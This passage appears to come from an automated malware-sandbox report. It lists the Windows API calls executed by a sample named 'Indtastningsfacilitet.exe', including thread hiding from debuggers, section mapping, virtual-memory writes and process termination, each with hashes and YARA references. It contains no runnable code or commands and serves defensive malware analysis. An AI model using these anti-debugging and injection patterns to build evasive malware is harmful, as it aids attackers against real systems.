                              • LoadLibraryA.KERNELBASE(00000000,0056263C,00000000,?,?,00000014,?,?,00000014), ref: 005670A3
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: efff87ac3b03003ad2f728d5e5e5d7b1a2429ac66944c1d105547d8fad82e60f
                              • Instruction ID: 51f687b12a603d961cf7132bb555a6ff6bd41acc3c3db3a204ef32ad4f018708
                              • Opcode Fuzzy Hash: efff87ac3b03003ad2f728d5e5e5d7b1a2429ac66944c1d105547d8fad82e60f
                              • Instruction Fuzzy Hash: C9C04C3090010DBF9F015FA0D99C9EE3B27EF40361BD04414FC1684450D771CDA09A11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00563FF4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00563FD4,0056401A,00560A54,?,?,?,0056074C,2D9CC76C,DFCB8F12), ref: 00564008
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
                              • Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00565DFC, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                              Download Yara Rule
                              APIs
                              • GetLongPathNameW.KERNELBASE(?,005604EE,00000200,00561C61,?,?,?,?,0056523B,00565200,00561457,?,?,00000004,?,00000000), ref: 00565E0B
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: LongNamePath
                              • String ID:
                              • API String ID: 82841172-0
                              • Opcode ID: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction ID: 1e4b140cf606c8bf0029eb496e81cd6aedcab3da80029c5d0d48980e8bac0d85
                              • Opcode Fuzzy Hash: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction Fuzzy Hash: FBB09275204300BBE650DA10CDC8F5BB7A8BB98700F108804BACA86142C630A804CB21
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00562AC4, Relevance: 1.3, APIs: 1, Instructions: 87sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNELBASE(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_00009402,00000000,00000000,00000000), ref: 00562BFB
                              Memory Dump Source
                              • Source File: 0000000E.00000002.344016500.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 145182cf6f5404f1d4f148bbd6cf84cd02c4f119afbe8a3cbc757f5fa00e6eea
                              • Instruction ID: 247fc9a830bd22978ab93fe0e6b6a6e4305ded10a8a23e6027f73632b81b9c3d
                              • Opcode Fuzzy Hash: 145182cf6f5404f1d4f148bbd6cf84cd02c4f119afbe8a3cbc757f5fa00e6eea
                              • Instruction Fuzzy Hash: 9A31E073405606EFD748CF24EA9EF18BB12FF69360F008355E2142F0FEDA7409428A96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Analysis Process: Indtastningsfacilitet.exe PID: 3808 Parent PID: 6284 Indtastningsfacilitet.exeCOMMON

                              Executed Functions

                              Function 021F12DE, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 206nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,021F074C), ref: 021F0A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: W.E$1.!T$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 4046476035-3275326604
                              • Opcode ID: 0c25f4cd9abb880cbf678008b4acfff4649b59cc02456b895c5b82e314590e8b
                              • Instruction ID: 0af42bc9896e1832abc76fd0ae594fda46ee7c6321a615d9a4f56c7dacdf974d
                              • Opcode Fuzzy Hash: 0c25f4cd9abb880cbf678008b4acfff4649b59cc02456b895c5b82e314590e8b
                              • Instruction Fuzzy Hash: C67145B2580304EFDB54CF24DE49B947766FF59364F004369EA282B2E9C7B458428B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F08B7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • EnumWindows.USER32(021F08D9,?,00000000,?,?,?,021F074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021F08BF
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,021F074C), ref: 021F0A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: EnumInformationThreadWindows
                              • String ID: 1.!T
                              • API String ID: 1954852945-3147410236
                              • Opcode ID: 497ae8d7dd8f3aebc14dc070877f9642268c13d40b4bc8e82ba561fdf277398e
                              • Instruction ID: ae7c86e3f001c52aa3e5dcf62fe4419e058a19b5d527e5b9f55d72c4bca3e534
                              • Opcode Fuzzy Hash: 497ae8d7dd8f3aebc14dc070877f9642268c13d40b4bc8e82ba561fdf277398e
                              • Instruction Fuzzy Hash: E13139B16803416FEB90AF748C95BAA7BA2AF89754F144218BFB55B2C1DB74DC02CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F8CF3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,021F074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021F93D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 021F9110
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction ID: 6ec5b39021c72c75f0a3c0c804bcd1e98ef0c2ff0822d7f30f31dda9f61cfd01
                              • Opcode Fuzzy Hash: 3523c760a5c293950f461c77b6c2dbde9f12bdd629fa0cb1d798bbd4ff789be1
                              • Instruction Fuzzy Hash: E551DA33505605CFCF9CDF24EA98B68B726EF69320F44936AD6241B1EDD77858828B81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F6DB9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: 1.!T
                              • API String ID: 0-3147410236
                              • Opcode ID: f6ab0dbb56da944bc9757293bed84c656bc5037f37e2ff443a4661029efe5e72
                              • Instruction ID: 8230844a56870616999b0beaffee92b71f28e702f63fabd33b37c27b10fbe4af
                              • Opcode Fuzzy Hash: f6ab0dbb56da944bc9757293bed84c656bc5037f37e2ff443a4661029efe5e72
                              • Instruction Fuzzy Hash: F741DDB5A80315AFEB54DF68CD90B9A77A1AF48754F168128FE686B381D730EC01CF84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F8DF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,021F074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021F93D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 021F9110
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction ID: 8246298718710ff6c7ab6f98dee667a680651fff458934b140d18af471cd5da8
                              • Opcode Fuzzy Hash: 2f65443e4c7b8292aaa49a776df75d68b763a7b5664891620c7b10ad8fbf9ee6
                              • Instruction Fuzzy Hash: 3651BA33405605DFCB9CEF24EA98B68B726EF69320F00936AD2240B1EDD37855828B81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F08EF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,021F074C), ref: 021F0A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 3637ad903b4ffc73ab5aa65ac6d9e10f0563131fb0e893ce303e404957812ea5
                              • Instruction ID: 4009e197b198d5558529bcb7352f65a72154b60244c50652bb671555a55bce94
                              • Opcode Fuzzy Hash: 3637ad903b4ffc73ab5aa65ac6d9e10f0563131fb0e893ce303e404957812ea5
                              • Instruction Fuzzy Hash: 6941E2B7400315AFCA88CF24EE99F54B716EF69360F008355E6242F2EDD77459428F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F8F0D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,021F074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021F93D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 021F9110
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction ID: f6b8b59cc521a5ea79811bfc930859856895d4f574237f6917ba5f792c470f55
                              • Opcode Fuzzy Hash: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction Fuzzy Hash: A541AC33405605DFCB9CDF24EA98B68B726FF69320F04936AD2241B1FDD77859828B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F9012, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,021F074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021F93D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 021F9110
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction ID: 7ab0f0d985f68f4850617cb7b0aa2dfee35cce1a8fbda713a1c6dfd17343fe34
                              • Opcode Fuzzy Hash: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction Fuzzy Hash: 0F41A933405609CFCB8CDF24EA99B68B726FF69320F04935AD2241B1EDC77855828B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F70B8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,021F074C), ref: 021F0A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: e9997e5dd5a77e7459c67e679e2deb1b3ed95a146ae482b66a8b77a36f338ac5
                              • Instruction ID: 4617538ebc40b8cfc66105e492ef76106602bfc5424a3fa821185a0e4bc59fb4
                              • Opcode Fuzzy Hash: e9997e5dd5a77e7459c67e679e2deb1b3ed95a146ae482b66a8b77a36f338ac5
                              • Instruction Fuzzy Hash: F02179707C0301AEFF945E608C90BEA76929F4A768F544129EFB51B2C1D775DC42CE40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F8CE9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,021F074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021F93D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 021F9110
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction ID: e339b7ee502ab6aae157e26a3472eba6b8945a0db4a4d39ae07ce344a5a20077
                              • Opcode Fuzzy Hash: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction Fuzzy Hash: 1F31F931684205CEEFADBE34C8987AD3656AF45318F9A526ACB768B1E1C33584C8C741
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F7088, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,021F074C), ref: 021F0A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 9497109f6d3084fd2b5641aefcac50174b11ddcf78b9c6eb7223a8f7cc936ef3
                              • Instruction ID: 8d94e8474e75857c5ad2e9fc00dd976bea44e083a494553f4c5d4adfd91680a0
                              • Opcode Fuzzy Hash: 9497109f6d3084fd2b5641aefcac50174b11ddcf78b9c6eb7223a8f7cc936ef3
                              • Instruction Fuzzy Hash: E32102B4680301AEFF90AE648D91BDA7A92AF49768F554224BF742B2C0D7B4DC02CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F310A, Relevance: 1.7, APIs: 1, Instructions: 248nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F37C3
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: e107bc7f7b01ac7e8782136ff2396909ef1fc6edd9ff7709a0323672e9eeaccc
                              • Instruction ID: 914f98782a7a568e314b2eb0eaabdc48b5925ee7da282af8c8ccf7a842f68979
                              • Opcode Fuzzy Hash: e107bc7f7b01ac7e8782136ff2396909ef1fc6edd9ff7709a0323672e9eeaccc
                              • Instruction Fuzzy Hash: E291D5B1281289BFEFA55F24CC45BEA3A66FF44704F114128FF64AB2D0C7B99494DB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F3187, Relevance: 1.7, APIs: 1, Instructions: 228nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F37C3
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 618c341106937c224e0c435043f6f05295e516e6f3a9ab25d2fead6b8bc7ba91
                              • Instruction ID: 0779a3ef31cb7d0c04cc5c026ad5f57decd7d272c9e80ca5d7a46c00bbaa57e8
                              • Opcode Fuzzy Hash: 618c341106937c224e0c435043f6f05295e516e6f3a9ab25d2fead6b8bc7ba91
                              • Instruction Fuzzy Hash: 129107B2141249AFEB548F14DD59FE9BA26FF58310F008329FB645B2E8D7B85481CF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F32EA, Relevance: 1.7, APIs: 1, Instructions: 199nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F37C3
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 22eeea5350ccaecbde2c97f57185d58107c7a804b4f50a6555705a45550ca15b
                              • Instruction ID: f4df319de9a14525fbe4f3e1e842c20297c4ae0232cc1c5b17c6c5d56dcdd6b0
                              • Opcode Fuzzy Hash: 22eeea5350ccaecbde2c97f57185d58107c7a804b4f50a6555705a45550ca15b
                              • Instruction Fuzzy Hash: 5981D4B6141249AFEBA8CF14DD59FE87626FF18350F008329FA645F2E8C7B855818F85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F34F5, Relevance: 1.6, APIs: 1, Instructions: 130nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F37C3
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 11132b9fa2c39009c4da43e460fe1e8b3f018c05640d141d5daecd013adc83aa
                              • Instruction ID: 7f53e4d4e3c3f5bbd345df720489c65a3e69219a9586a0b205c25cff26605ac9
                              • Opcode Fuzzy Hash: 11132b9fa2c39009c4da43e460fe1e8b3f018c05640d141d5daecd013adc83aa
                              • Instruction Fuzzy Hash: EE51D677401149AFDB58CF14EE99BA8B716FF68360F008365E6245B1FCD77815828F85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F911A, Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,021F074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021F93D6
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction ID: fe65d5ff7ebab1206d69d652984c2270cd3c99e092ba362de63890f0fc0e3ebc
                              • Opcode Fuzzy Hash: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction Fuzzy Hash: B241AB33405605DFCB98DF24EA98B68B726FF6A320F04935AD2241F1FDD77855828B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F36AE, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021F37C3
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 4aa657c7a155d8a1720fd16a7485b86e8b714806fdc3d59e61a552f72ac0176f
                              • Instruction ID: 795604193aa2ccb55c59cf54d4c521735b920ea342f9665965f5cd4bcf54f14b
                              • Opcode Fuzzy Hash: 4aa657c7a155d8a1720fd16a7485b86e8b714806fdc3d59e61a552f72ac0176f
                              • Instruction Fuzzy Hash: 1741BF77415509EFCA88CF24EA99E58BB26FF6C360F009365E2181B1FDDA7814828FD5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F92AE, Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,021F074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021F93D6
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction ID: b629df80d1fc9a957fa9b201da231fdfe6e1d96d7d99979356c5d5d32bc110e8
                              • Opcode Fuzzy Hash: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction Fuzzy Hash: CE31D97741551ADF8A8CCF24E69D828B72AFF6A370300935AD2241F1FDD67415828F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F87FD, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021F82E2,00000040,021F0A2A,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021F8816
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                              • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F0B98, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 364COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: W.E$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 0-3368095338
                              • Opcode ID: b00121ad8b0649bfc57cbeeb775ac7c077d93440dcaaaa052e4c53e6235dc975
                              • Instruction ID: 6aa8321640549f7d3cd450d4f899c9b5ee3d70ee8b8fccf92ac8eb28d5284eb3
                              • Opcode Fuzzy Hash: b00121ad8b0649bfc57cbeeb775ac7c077d93440dcaaaa052e4c53e6235dc975
                              • Instruction Fuzzy Hash: 65D1BB725C0244EFDBA88F24CD98BE87726EF95314F144229EB785B1E9C7789882CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F0BFF, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F3B00
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 560597551-526444393
                              • Opcode ID: f1b22a8722dea5756648d0af83c2de20dab743b2904e6c978dc5c6d6d518502c
                              • Instruction ID: 5bf1bb9d7e2ddabbb8ed331bc6ab233b6c7825cebaf3825e45ecc8ec49d95fff
                              • Opcode Fuzzy Hash: f1b22a8722dea5756648d0af83c2de20dab743b2904e6c978dc5c6d6d518502c
                              • Instruction Fuzzy Hash: 0B71BD339C1204EFDBA88E24DD98FF8B71AEF95314F144229EA78571D8CB3998478A51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F0D7B, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F3B00
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 560597551-526444393
                              • Opcode ID: eb99c11291603696b9cad04f4a2219f0b5de5450c7cddc3a570fcb09d9eeb7a3
                              • Instruction ID: 7b68e2a805f8739c04ff7adf64efd56e784e65be2583c2796ea3d90764a60e2e
                              • Opcode Fuzzy Hash: eb99c11291603696b9cad04f4a2219f0b5de5450c7cddc3a570fcb09d9eeb7a3
                              • Instruction Fuzzy Hash: 0F517F73985204EFDB98CF24ED99FA8B716EF96360F008319E6781B1E9C77858428F51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021F0ECF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F3B00
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.337005428.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 560597551-526444393
                              • Opcode ID: c7a599d85bf64b9d8138eab6948e88540e580039dcca48462e3fee89a7626fcf
